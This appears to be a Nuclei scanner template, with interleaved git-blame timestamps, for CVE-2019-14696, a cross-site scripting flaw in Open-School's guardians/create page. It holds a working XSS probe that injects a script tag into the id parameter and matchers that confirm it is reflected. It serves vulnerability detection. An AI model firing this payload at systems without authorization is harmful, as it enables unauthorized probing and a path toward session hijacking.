2021-01-02 04:59:06 +00:00
id : CVE-2019-14696
2020-09-04 15:46:07 +00:00
info :
2022-11-01 13:13:42 +00:00
name : Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting
2020-09-04 15:46:07 +00:00
author : pikpikcu
2020-09-05 06:40:16 +00:00
severity : medium
2022-08-12 00:45:50 +00:00
description : Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:53:28 +00:00
remediation : |
To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://open-school.org
- https://pastebin.com/AgxqdbAQ
- http://packetstormsecurity.com/files/153984/Open-School-3.0-Community-Edition-2.3-Cross-Site-Scripting.html
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-14696
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-14696
cwe-id : CWE-79
2024-03-23 09:28:19 +00:00
epss-score : 0.00618
epss-percentile : 0.78345
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : open-school
product : open-school
2024-01-14 09:21:50 +00:00
tags : cve,cve2019,xss,open-school,packetstorm
2020-09-04 15:46:07 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-09-17 09:58:51 +00:00
- method : GET
2020-09-04 15:46:07 +00:00
path :
2020-09-04 15:51:55 +00:00
- '{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2020-09-04 15:46:07 +00:00
matchers-condition : and
matchers :
- type : word
2022-11-01 13:13:42 +00:00
part : body
2020-09-04 15:46:07 +00:00
words :
- '<script>alert(document.domain)</script>'
2022-11-01 13:13:42 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 490a00463044022021c34366a64cbfdefebecb4aa4f7c353eea5fdc366066e809cb883b1b48eebfa022037201460a13c29307875ac704248267640de95a2ab5743fdca89234c2bde1126:922c64590222798bb761d5b6d8e72950